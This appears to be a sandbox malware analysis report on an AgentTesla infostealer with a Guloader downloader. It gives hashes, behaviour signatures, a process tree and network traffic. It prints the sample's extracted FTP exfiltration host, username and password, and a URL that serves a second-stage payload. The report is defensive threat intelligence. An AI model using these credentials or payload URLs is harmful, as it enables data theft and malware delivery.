Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/12/2024, 03:32 UTC

General

  • Target

    b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe

  • Size

    999KB

  • MD5

    5c45c0877fb82d10594fde27ceef591d

  • SHA1

    ea68349b2af800d39680cf50da9e3284ec1d52a4

  • SHA256

    b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052

  • SHA512

    d6497d61d8bbf155223fe4554783b0e86ab326ffb20bbbac4b444e0d27f16715458bf055085732c4204cbccba84419de62bd75615602a291e26c1dbc74a6bda9

  • SSDEEP

    24576:+YB//x9siaesoieYuVffHku3WggclxxIJzsGOB:j9//FAUHffHkumggclxGZW

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.rusticpensiune.ro
  • Port:
    21
  • Username:
    AdminFTP@rusticpensiune.ro
  • Password:
    hr,d@KUwa5llI%*RNL^J]g%8I;!;_Ne#G1h~lE!*86DAAD6#iLm$x)r+e1z$p+_Q,4_(f!};B?vD!IG?NqT[zOHNr6_nww[S]V?MlcYSt_QO

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Agenttesla family
  • Guloader family
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe
    "C:\Users\Admin\AppData\Local\Temp\b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:2524
    • C:\Users\Admin\AppData\Local\Temp\b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe
      "C:\Users\Admin\AppData\Local\Temp\b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe"
      2⤵
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1388

Network

  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    88.210.23.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.210.23.2.in-addr.arpa
    IN PTR
    Response
    88.210.23.2.in-addr.arpa
    IN PTR
    a2-23-210-88deploystaticakamaitechnologiescom
  • flag-us
    DNS
    22.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.corella.ro
    b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe
    Remote address:
    8.8.8.8:53
    Request
    www.corella.ro
    IN A
    Response
    www.corella.ro
    IN CNAME
    corella.ro
    corella.ro
    IN A
    109.73.128.91
  • flag-ro
    GET
    https://www.corella.ro/imges-drive-content/xClBgxfB133.bin
    b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe
    Remote address:
    109.73.128.91:443
    Request
    GET /imges-drive-content/xClBgxfB133.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: www.corella.ro
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Tue, 10 Dec 2024 03:32:25 GMT
    Server: Apache
    Last-Modified: Mon, 09 Dec 2024 05:41:04 GMT
    Accept-Ranges: bytes
    Content-Length: 241216
    Content-Type: application/octet-stream
  • flag-us
    DNS
    91.128.73.109.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    91.128.73.109.in-addr.arpa
    IN PTR
    Response
    91.128.73.109.in-addr.arpa
    IN PTR
    server1djembaro
  • flag-us
    DNS
    168.245.100.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.245.100.95.in-addr.arpa
    IN PTR
    Response
    168.245.100.95.in-addr.arpa
    IN PTR
    a95-100-245-168deploystaticakamaitechnologiescom
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    200.163.202.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.163.202.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    180.129.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.129.81.91.in-addr.arpa
    IN PTR
    Response
  • 109.73.128.91:443
    https://www.corella.ro/imges-drive-content/xClBgxfB133.bin
    tls, http
    b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe
    9.3kB
    253.6kB
    192
    187

    HTTP Request

    GET https://www.corella.ro/imges-drive-content/xClBgxfB133.bin

    HTTP Response

    200
  • 8.8.8.8:53
    241.150.49.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.150.49.20.in-addr.arpa

  • 8.8.8.8:53
    88.210.23.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    88.210.23.2.in-addr.arpa

  • 8.8.8.8:53
    22.160.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    22.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    www.corella.ro
    dns
    b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe
    60 B
    90 B
    1
    1

    DNS Request

    www.corella.ro

    DNS Response

    109.73.128.91

  • 8.8.8.8:53
    91.128.73.109.in-addr.arpa
    dns
    72 B
    103 B
    1
    1

    DNS Request

    91.128.73.109.in-addr.arpa

  • 8.8.8.8:53
    168.245.100.95.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    168.245.100.95.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    200.163.202.172.in-addr.arpa
    dns
    74 B
    160 B
    1
    1

    DNS Request

    200.163.202.172.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    180.129.81.91.in-addr.arpa
    dns
    72 B
    147 B
    1
    1

    DNS Request

    180.129.81.91.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\nsd763B.tmp\System.dll

    Filesize

    12KB

    MD5

    cff85c549d536f651d4fb8387f1976f2

    SHA1

    d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e

    SHA256

    8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8

    SHA512

    531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88

  • memory/1388-22-0x0000000037240000-0x00000000372A6000-memory.dmp

    Filesize

    408KB

  • memory/1388-15-0x00000000016F0000-0x0000000004622000-memory.dmp

    Filesize

    47.2MB

  • memory/1388-19-0x0000000000490000-0x00000000016E4000-memory.dmp

    Filesize

    18.3MB

  • memory/1388-20-0x0000000000490000-0x00000000004D2000-memory.dmp

    Filesize

    264KB

  • memory/1388-21-0x00000000374F0000-0x0000000037A94000-memory.dmp

    Filesize

    5.6MB

  • memory/1388-24-0x0000000037DE0000-0x0000000037E30000-memory.dmp

    Filesize

    320KB

  • memory/1388-25-0x0000000037E30000-0x0000000037EC2000-memory.dmp

    Filesize

    584KB

  • memory/1388-26-0x0000000037F20000-0x0000000037F2A000-memory.dmp

    Filesize

    40KB

  • memory/1388-27-0x00000000016F0000-0x0000000004622000-memory.dmp

    Filesize

    47.2MB

  • memory/2524-12-0x00000000771E1000-0x0000000077301000-memory.dmp

    Filesize

    1.1MB

  • memory/2524-13-0x0000000073ED5000-0x0000000073ED6000-memory.dmp

    Filesize

    4KB

  • memory/2524-14-0x00000000032B0000-0x00000000061E2000-memory.dmp

    Filesize

    47.2MB

  • memory/2524-11-0x00000000032B0000-0x00000000061E2000-memory.dmp

    Filesize

    47.2MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.